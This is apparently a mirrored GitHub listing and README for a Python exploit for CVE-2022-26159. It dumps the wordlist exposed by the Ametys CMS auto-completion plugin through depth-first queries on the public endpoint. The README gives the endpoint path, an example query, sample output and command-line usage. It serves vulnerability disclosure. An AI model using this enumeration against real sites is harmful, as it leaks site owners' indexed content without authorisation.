https://github.com/p0dalirius/cve-2022-26159-ametys-autocompletion-xml
A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file.
https://github.com/p0dalirius/cve-2022-26159-ametys-autocompletion-xml
ametys autocompletion cms exploit plugin
Last synced: about 1 month ago
JSON representation
A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file.
- Host: GitHub
- URL: https://github.com/p0dalirius/cve-2022-26159-ametys-autocompletion-xml
- Owner: p0dalirius
- Created: 2022-02-21T19:59:11.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-05-03T10:40:26.000Z (over 3 years ago)
- Last Synced: 2025-04-06T18:23:48.810Z (6 months ago)
- Topics: ametys, autocompletion, cms, exploit, plugin
- Language: Python
- Homepage: https://podalirius.net/
- Size: 159 KB
- Stars: 12
- Watchers: 2
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
Awesome Lists containing this project
README
# CVE-2022-26159-Ametys-Autocompletion-XML
A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file.
## Features
- [x] Automatic detection of maximum results returned by the autocompletion plugin.
- [x] Depth first search to dump all the results.
- [x] Output log file.
## Usage
```
$ ./CVE-2022-26159-Ametys-Autocompletion-XML.py -h
CVE-2022-26159-Ametys-Autocompletion-XML v1.1 - by @podalirius
usage: CVE-2022-26159-Ametys-Autocompletion-XML.py [-h] -t TARGET [-H HEADERS] [-k] [-v | -q] [--no-colors]
Description message
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
arg1 help message
-H HEADERS, --header HEADERS
Specify HTTP headers to use in requests. (e.g., --header "Header1: Value1" --header "Header2: Value2")
-k, --insecure Disable SSL/TLS warnings and certificate verification.
-v, --verbose Verbose mode. (default: False)
-q, --quiet Quiet mode. (default: False)
--no-colors Disables colored output. (default: False)
```
## Technical details
The autocompletion plugin in Ametys CMS <= 4.4.9 exposes publicly an XML file containing a wordlist at the following address:
```
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml
```
To perform a request on this database, an attacker just needs to type the start of the word in the `q` (query) parameter:
```
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml?q=adm
```
And the auto-completion plugin returns the first 10 matching words starting with `adm` (from the query) in an XML file:
```xml
administrateur
administrateurs
administratif
administratifs
administration
administrations
administrative
administratives
administres
admission
```
With this in mind, an attacker just needs to perform a [depth first search on the API](https://podalirius.net/en/articles/scraping-search-apis-depth-first-style/) to extract all the content of it.
## Contributing
Pull requests are welcome. Feel free to open an issue if you want to add other features.
## References
- https://podalirius.net/en/cves/2022-26159/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26159
- https://issues.ametys.org/browse/CMS-10973
- https://podalirius.net/en/articles/scraping-search-apis-depth-first-style/